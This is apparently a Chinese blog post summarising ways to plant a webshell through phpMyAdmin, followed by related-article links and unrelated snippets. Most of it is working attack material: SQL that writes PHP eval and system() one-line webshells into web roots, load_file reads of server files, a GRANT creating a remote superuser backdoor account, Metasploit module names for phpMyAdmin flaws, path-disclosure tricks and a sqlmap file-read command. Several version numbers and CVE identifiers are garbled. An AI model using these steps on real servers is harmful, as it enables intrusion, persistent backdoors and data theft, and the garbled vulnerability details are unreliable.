方法一:
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/.php
一句话连接密码:xiaoma

方法二:
 Create TABLE xiaoma (xiaoma1 text NOT NULL);
 Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
 select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
 Drop TABLE IF EXISTS xiaoma;

方法三:

读取文件内容:    select load_file('E:/xamp/www/s.php');

写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'

cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'

方法四:
 select load_file('E:/xamp/www/xiaoma.php');

 select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'

 然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
phpmyadmin 漏洞总结 (-- ::)
一: 影响版本: < -rc3

    概述:PhpMyAdmin存在PREG_REPLACE_EVAL漏洞

    利用模块:exploit/multi/http/phpmyadmin_preg_replace

    CVE: CVE--

    二: 影响版本:phpMyAdmin v3.

    概述:PhpMyAdmin存在server_sync.php 后门漏洞

    利用模块:exploit/multi/http/phpmyadmin_3522_backdoor

    CVE: CVE--

    三: 影响版本: .x < 3.1.3.1;

    概述:PhpMyAdmin配置文件/config/config.inc.php存在命令执行

    利用模块:exploit/unix/webapp/phpmyadmin_config

    CVE: CVE--

.  影响版本:phpmyadmin --phpmyadmin 2.11.4利用方式:直接在phpmyadmin的用户名内填入:  密码空
'localhost'@'@"
复制代码5. phpMyAdmin < .x Swekey远程代码注入攻击

. phpmyadmin 2.80 反序列 lfi、 rfi包含 漏洞文件 ss

phpmyadmin一句话开启外链mysql :添加超级用户guetsec密码ooxx并且允许外连 

GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;

phpmyadmin 暴绝对路径: 

. 用Web路径自动盲爆工具 V2. 乌云内测(带字典).rar

.扫phpinfo.php  info.php  php.php  test.php等等

. 上传图片 超长文件名!

.phpmyadmin构造xml上传暴路径

.phpmyadmin读取系统文件cmd爆路径!

.phpmyadmin读取 iis6,iis7配置文件  读取apache  Nginx 配置文件!

windows2003 iis6配置文件所在位置C:\Windows/system32\inetsrv\metabase.xml
win2008/ iis7. 在这个文件C:\Windows\System32\inetsrv\config\applicationHost.config
apache配置:/etc/httpd/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf 

Nginx配置  /etc/nginx/conf.d/vhost.conf
                /usr/local/etc/nginx/nginx.conf
穿山甲只能读一部分,  上sqlmap

sqlmap -u url --file-read 'C:\Windows\System32\inetsrv\config\applicationHost.config'

phpmyadmin后台拿shell方法总结的更多相关文章

  1. KesionCMS V6.5后台拿SHELL方法

    Title:KesionCMS V6.5后台拿SHELL方法  --2011-03-29 00:21 最近弄一个站点,是KesionCMS V6.5的WEB系统,试了下后台拿webshell方法,记下 ...

  2. PhpMyadmin后台拿webshell方法总结

    前言: phpmyadmin后台拿webshell的方法主要分为两个方法: (1) .通过日志文件拿webshell; (2) .利用日志文件写入一句话;(这个方法可能在实际操作中会遇到困难): 本地 ...

  3. 在phpmyadmin后台获取webshell方法汇总整理

    方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma ...

  4. phpmyadmin后台4种拿shell方法 && php爆路径大法

    php后台拿shell要知道php的路径,文章下面将讲诉爆php路径的方法!!! 方法一: CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL ); IN ...

  5. linux系统ecshop拿shell方法

    Title:linux系统ecshop拿shell方法  --2011-06-08 13:23 最近弄一个站,对ECSHOP拿shell不了解,导致走了很多的弯路. nginx/0.8.54的服务器, ...

  6. Linux后台执行的方法 - 关闭、退出不影响

    =============================================================================================nohup c ...

  7. 利用SQL注入漏洞登录后台的实现方法

    利用SQL注入漏洞登录后台的实现方法 作者: 字体:[增加 减小] 类型:转载 时间:2012-01-12我要评论 工作需要,得好好补习下关于WEB安全方面的相关知识,故撰此文,权当总结,别无它意.读 ...

  8. JQuery EasyUI弹出对话框解决Asp.net服务器控件无法执行后台代码的方法(转)

    原文:JQuery EasyUI弹出对话框解决Asp.net服务器控件无法执行后台代码的方法 jquery-easyui是一个基于jquery的图形界面插件,利用easyui可以创建很多好看的网页界面 ...

  9. CreateLiveCMSV4.0 漏洞,无需后台Get shell

    Title:CreateLiveCMSV4.0 漏洞,无需后台Get shell --2012-03-06 17:28 标题:CreateLive CMS Version 4.0.1006 漏洞,无需 ...

随机推荐

  1. oc 字符串

    #import <Foundation/Foundation.h> int main(int argc, const char * argv[]) { @autoreleasepool { ...

  2. python 格式化字符串的三种方法

    1)%格式化方法 >>> a = "this is %s %s" % ("my", "apple") >>&g ...

  3. iOS开发网络篇—网络编程基础(一)

    一.为什么要学习网络编程 1.简单说明 在移动互联网时代,移动应用的特征有: (1)几乎所有应用都需要用到网络,比如QQ.微博.网易新闻.优酷.百度地图 (2)只有通过网络跟外界进行数据交互.数据更新 ...

  4. Effective Java 23 Don't use raw types in new code

    Generic types advantage Parameterized type can provide erroneous check in compile time. // Parameter ...

  5. Memcache限制端口和访问IP

    Memcache安装十分简单,默认情况下是任何人都可以访问服务器上缓存的数据,所以如果不作处理的话 是很不安全的(乌云上已经提交有很多与此相关的问题) 1.首先要保证服务器上的防火墙都是开启的 2.设 ...

  6. springMVC 接收数组参数,mybatis 接收数组参数,mybatis批量插入/批量删除案例

    案例是给一个用户赋予多个权限,多个权限用其对应的主键 id 为参数,组成了 一个id数组,传给springMVC,然后springMVC传给mybatis,然后mybatis批量插入.其实类似的场景还 ...

  7. 关于移动端的font和图片的问题

    一.font-family 使用无衬线字体 body { font-family: "Helvetica Neue", Helvetica, STHeiTi, sans-serif ...

  8. 查看mysql主从配置的状态及修正 slave不启动问题

    1.查看master的状态 mysql> show master status;  //Position不应该为0 mysql> show processlist;  //state状态应 ...

  9. 问题解决——SolidWorks 已停止工作 (Windows7 + SolidWorks 2010 SP0.0)

    给同事的SolidWorks解决问题时偶然间发现的. -------------------------------------------------------------- 本文原创,转载请注明 ...

  10. 04_最长上升子序列问题(LIS)

    来源:刘汝佳<算法竞赛入门经典--训练指南> P60 问题6: 问题描述:给定n个整数a1,a2,...,an,按从左到右的顺序选出尽量多的整数,组成一个上升子序列(子序列可以理解为:删除 ...